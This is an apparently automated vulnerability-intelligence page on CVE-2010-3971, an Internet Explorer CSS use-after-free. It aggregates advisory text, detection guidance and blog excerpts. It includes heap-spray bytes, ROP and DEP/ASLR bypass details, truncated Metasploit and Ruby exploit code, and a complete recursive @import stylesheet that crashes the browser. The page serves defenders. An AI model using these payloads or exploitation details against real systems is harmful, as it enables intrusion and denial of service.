CVE-2010-3971
published 2010-12-22CVE-2010-3971: Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet…
PriorityP274critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
81.66%
99.6th percentile
Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability."
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0c0c0c0900000008000000730073030100000000010000730073030c
- →Detect recursive/self-referential CSS @import rules in HTTP responses — the exploit triggers via a stylesheet that imports itself or imports the same CSS file multiple times. ↗
- →Alert on User-Agent strings containing both 'MSIE 6.0/7.0/8.0' and '.NET CLR 2.0.50727' — the Metasploit module explicitly requires .NET CLR 2.0.50727 in the UA and aborts otherwise. ↗
- →Monitor for HTTP responses serving Content-Type 'text/css' containing multiple '@import url(...)' directives pointing to the same resource, indicative of the recursive import trigger. ↗
- →Detect HTML pages served as UTF-16 (BOM 0xFF 0xFE or 0xFE 0xFF) that also load a .NET DLL (Content-Type: application/x-msdownload) — the exploit serves a .NET DLL to load mscorie.dll for ROP-based DEP/ASLR bypass. ↗
- →Look for heap spray patterns using the byte sequence 0x0c0c0c0c or the specific blob '0c0c0c09000000080000007300730301...' in memory or network captures associated with IE CSS exploitation. ↗
- →The Metasploit module uses 'migrate -f' as InitialAutoRunScript — post-exploitation process migration activity should be correlated with prior IE CSS anomalies. ↗
- ·The ROP chain and base address (0x63f00000) are specific to mscorie.dll version v2.0.50727.3053 — exploitation fails if a different .NET 2.0 patch level is installed. ↗
- ·The Metasploit module explicitly does not opt-in to ASLR and relies on mscorie.dll being a non-ASLR module; systems without .NET 2.0 installed are not exploitable by this module. ↗
- ·The IE6 target uses the same crash/debug return address (0xc0c0c0c0) as the Debug Target, meaning reliable code execution on IE6 was not implemented in this module version. ↗
- ·The exploit has no vuln_test capability — the module cannot pre-check whether the target is vulnerable before attempting exploitation. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r6fx-qpgx-pg2w: Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml
ghsa_unreviewed·2022-05-13
CVE-2010-3971 [HIGH] GHSA-r6fx-qpgx-pg2w: Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml
Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability."
VulnCheck
Microsoft CSS Memory Corruption Vulnerability
vulncheck·2010·CVSS 9.3
CVE-2010-3971 [CRITICAL] Microsoft CSS Memory Corruption Vulnerability
Microsoft CSS Memory Corruption Vulnerability
Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a self-referential @import rule in a stylesheet, aka "CSS Memory Corruption Vulnerability."
Affected: Microsoft Internet Explorer
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-003
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)
exploitdb·2011-02-08
CVE-2010-3971 Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)
Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)
---
##
# $Id: ms11_003_ie_css_import.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
:ua_minver => "7.0", # Should be 6
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer CSS Recursive Import Use After Free',
'Description' => %q{
Exploit-DB
Microsoft Internet Explorer 8 - CSS Parser
exploitdb·2010-12-15
CVE-2010-3971 Microsoft Internet Explorer 8 - CSS Parser
Microsoft Internet Explorer 8 - CSS Parser
---
#!/usr/bin/env ruby
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)
require 'socket'
def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
opts = defaults.merge(opts)
code = opts[:code]
message = opts[:message]
type = opts[:type]
to_send = "HTTP/1.1 #{code} #{message}\r\n" +
"Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" +
"Cache-Control: no-cache\r\n" +
"Content-Type: #{type}\r\n" +
"Pragma: no-cache\r\n" +
"Content-Length: #{data.length}\r\n\r\n" +
"#{data}"
puts "[+] Sending:"
to_send.split("\n").each do |line|
puts " #{line}"
end
sock.write(to_send) rescue return false
return true
end
def sock_read(sock, out_str, timeout=5)
beg
Exploit-DB
Microsoft Internet Explorer 8 - CSS Parser Denial of Service
exploitdb·2010-12-08
CVE-2010-3971 Microsoft Internet Explorer 8 - CSS Parser Denial of Service
Microsoft Internet Explorer 8 - CSS Parser Denial of Service
---
*{
color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
Exploit-DB Notes:
* Original credit goes to an unidentified researcher using WooYun anonymous account "路人甲".
WooYun is a connection platform for vendors and security researchers:
http://www.wooyun.org/bugs/wooyun-2010-0885
* Dec 22, 2010 - Microsoft releases security advisory for this vulnerability:
http://www.microsoft.com/technet/security/advisory/2488013.mspx
Metasploit
MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free
metasploit
MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free
MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free
This module exploits a memory corruption vulnerability within Microsoft\'s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.
Krebs
In a Zero-Day World, It’s Active Attacks that Matter – Krebs on Security
blogs_krebs·2012-10-01
In a Zero-Day World, It’s Active Attacks that Matter – Krebs on Security
The recent zero-day vulnerability in Internet Explorer caused many (present company included) to urge Internet users to consider surfing the Web with a different browser until Microsoft issued a patch. Microsoft did so last month, but not before experts who ought to have known better began downplaying such advice, pointing out that other browser makers have more vulnerabilities and just as much exposure to zero-day flaws.
This post examines hard data that shows why such reasoning is more emotional than factual. Unlike Google Chrome and Mozilla Firefox users, IE users were exposed to active attacks against unpatched, critical vulnerabilities for months at a time over the past year and a half.
Attackers exploited zero-day holes in Internet Explorer for at least 89 days over the past 19 mon
Krebs
In a Zero-Day World, It’s Active Attacks that Matter
blogs_krebs·2012-10-01
In a Zero-Day World, It’s Active Attacks that Matter
The recent zero-day vulnerability in Internet Explorer caused many (present company included) to urge Internet users to consider surfing the Web with a different browser until Microsoft issued a patch. Microsoft did so last month, but not before experts who ought to have known better began downplaying such advice, pointing out that other browser makers have more vulnerabilities and just as much exposure to zero-day flaws.
This post examines hard data that shows why such reasoning is more emotional than factual. Unlike Google Chrome and Mozilla Firefox users, IE users were exposed to active attacks against unpatched, critical vulnerabilities for months at a time over the past year and a half.
Attackers exploited zero-day holes in Internet Explorer for at least 89 days over the past 19 mon
Talos
'Tis the Season for 0-days
blogs_talos·2010-12-23
'Tis the Season for 0-days
Hello, all! This is just a quick note that Microsoft has released a bulletin regarding a new 0-day in Internet Explorer versions 7 and 8. You can read all about it in their advisory at http://www.microsoft.com/technet/security/advisory/2488013.mspx as well as the reference for the CVE, 2010-3971. We have previously released coverage for this vulnerability in sids 18196 and 18240. Because we released coverage before Microsoft posted their bulletin or a CVE had been assigned, these rules do not have those references. We will release updated rules with the new references after the holidays.
In addition to the above CSS issue, two other 0-days have been making the rounds lately that I wanted to call attention to -- a vulnerable Active-X control that allows remote code execution that we defend
Talos
'Tis the Season for 0-days
blogs_talos·2010-12-23
'Tis the Season for 0-days
## 'Tis the Season for 0-days
Hello, all! This is just a quick note that Microsoft has released a bulletin regarding a new 0-day in Internet Explorer versions 7 and 8. You can read all about it in their advisory at http://www.microsoft.com/technet/security/advisory/2488013.mspx as well as the reference for the CVE, 2010-3971. We have previously released coverage for this vulnerability in sids 18196 and 18240. Because we released coverage before Microsoft posted their bulletin or a CVE had been assigned, these rules do not have those references. We will release updated rules with the new references after the holidays.
In addition to the above CSS issue, two other 0-days have been making the rounds lately that I wanted to call attention to -- a vulnerable Active-X control that allows remot
Zscaler
Zscaler found Multiple Security Vulnerabilities | 02-08-2011
blogs_zscaler·CVSS 9.3
[CRITICAL] Zscaler found Multiple Security Vulnerabilities | 02-08-2011
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
http://blogs.technet.com/b/srd/archive/2011/01/07/assessing-the-risk-of-public-issues-currently-being-tracked-by-the-msrc.aspxhttp://seclists.org/fulldisclosure/2010/Dec/110http://secunia.com/advisories/42510http://support.avaya.com/css/P8/documents/100127294http://www.breakingpointsystems.com/community/blog/ie-vulnerability/http://www.exploit-db.com/exploits/15708http://www.exploit-db.com/exploits/15746http://www.kb.cert.org/vuls/id/634956http://www.microsoft.com/technet/security/advisory/2488013.mspxhttp://www.securityfocus.com/bid/45246http://www.securitytracker.com/id?1024922http://www.vupen.com/english/advisories/2010/3156http://www.vupen.com/english/advisories/2011/0318http://www.wooyun.org/bugs/wooyun-2010-0885https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-003https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12382http://blogs.technet.com/b/srd/archive/2011/01/07/assessing-the-risk-of-public-issues-currently-being-tracked-by-the-msrc.aspxhttp://seclists.org/fulldisclosure/2010/Dec/110http://secunia.com/advisories/42510http://support.avaya.com/css/P8/documents/100127294http://www.breakingpointsystems.com/community/blog/ie-vulnerability/http://www.exploit-db.com/exploits/15708http://www.exploit-db.com/exploits/15746http://www.kb.cert.org/vuls/id/634956http://www.microsoft.com/technet/security/advisory/2488013.mspxhttp://www.securityfocus.com/bid/45246http://www.securitytracker.com/id?1024922http://www.vupen.com/english/advisories/2010/3156http://www.vupen.com/english/advisories/2011/0318http://www.wooyun.org/bugs/wooyun-2010-0885https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-003https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12382
2010-12-22
Published
Exploited in the wild